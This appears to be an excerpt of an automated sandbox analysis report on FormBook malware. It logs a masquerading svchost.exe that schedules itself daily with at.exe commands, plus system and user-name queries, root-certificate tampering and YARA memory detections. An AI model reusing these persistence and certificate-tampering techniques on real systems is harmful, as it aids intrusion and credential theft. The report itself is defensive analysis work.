Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:51 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:53 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:55 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:57 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:59 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:03 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:05 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:13 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: unknown unknown

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Contains functionality to query the account / user name

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow,

4_2_0041E9D0

Queries the cryptographic machine GUID

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Users\Public\vbc.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY